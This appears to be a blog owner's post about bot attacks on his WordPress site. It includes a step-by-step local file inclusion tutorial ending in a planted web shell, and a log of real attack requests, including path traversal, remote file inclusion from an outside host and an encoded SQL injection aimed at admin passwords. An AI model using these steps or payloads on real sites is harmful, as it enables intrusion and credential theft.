Someone Trying To Inject IvanKristianto.com

Recently i have a bad news. Beside the digital world is at war between piracy community and anti piracy company. My blog also being attack by unknown. In my opinion they are trying to find a vulnerability using a bot. They try to find a way to inject a malicious code using local file inclusion vulnerability.

How to inject malicious code using local file inclusion vulnerability:

1. Check if the website have vulnerability:

   www.website.com/view.php?page=contact.php.
   

   If your target site have url like that then it’s a big possibility have LFI vulnerable.

2. Change contact.php to ../ see if it has an error warning:

   www.website.com/view.php?page=../
   

   if you got error like this:

   Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/username/public_html/website.com/view.php on line 1337
   [/bash]
   That's a big chance to inject a malicious code.

3. Try find the /etc/passwd:

   www.website.com/view.php?page=../../../../../etc/passwd
   

   if it show like this:

   root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown...
   

   Then you are ready to go to next step.

4. Checking if proc/self/environ is accessible.

   www.website.com/view.php?page=../../../../../proc/self/environ
   

   If you get no error message and return a result like this:

   DOCUMENT_ROOT=/home/username/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x [email protected] SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
   Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
   [/bash]
   Then proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

5. Inject malicious code Download tamper data firefox extension, change the User-Agent.Start Tamper Data in Firefox: Request url: www.website.com/view.php?page=../../../../../proc/self/environ User-Agent filed:

   
   [/bash]
   Then submit the request.
   Our command will be executed (will download the txt shell from http://url-to-your malicious-code/ and will save it as shell.php in the website directory)

6. Access your malicious code:

   www.website.com/shell.php
   

With the technique here is the proove that i got attack:

GET /main.php?path=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
X-Forwarded-For: 134.208.10.111
X-Real-Ip: 134.208.10.111

GET /main.php?path=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
X-Forwarded-For: 134.208.10.111
X-Real-Ip: 134.208.10.111

GET /main.php?path=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
X-Forwarded-For: 134.208.10.111
X-Real-Ip: 134.208.10.111

GET  /os/ubuntu/beginners-guide-how-to-use-wget/http:/ioputas.com/index.php?option=com_s5clanroster&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: libwww-perl/5.813
X-Forwarded-For: 89.187.142.150
X-Real-Ip: 89.187.142.150

GET /os/ubuntu/?_SERVER[DOCUMENT_ROOT]=http://amalocksmith.com/images/stories/fruit/.../walk1.gif?? HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: Mozilla/5.0
X-Forwarded-For: 75.125.163.210
X-Real-Ip: 75.125.163.210

GET  /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxNDI6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfaWQsMHgzYSx1c2VyX25hbWUsMHgzYSxwYXNzd29yZCwnIlwnKSB1bmlvbiBzZWxlY3QgMiMiJyksMSBmcm9tIGFkbWluX3VzZXIgbGltaXQgMyMiO2k6Mjt9fQ== HTTP/1.0
Connection: close
Host: www.ivankristianto.com
X-Forwarded-For: 222.76.218.41
X-Real-Ip: 222.76.218.41

#Someone trying to inject with xmlrpc:
GET /xmlrpc.php HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: libwww-perl/5.837
X-Forwarded-For: 66.71.254.10
X-Real-Ip: 66.71.254.10

There are still lot of it. Speaking about security and vulnerability there are lot of ways to do it. So keep update your security (in this case i'm using WordPress), backup your data regularly and watch your log regularly. And i thanks for those who attack me, because of you i learn a new thing, and i'm trying find a way to hardening my security. Even i'm still a newbie in this area.

Thanks to:
WHM/CPanel
ClamAV
Wordpress plugin Bad Behavior
www.0x50sec.org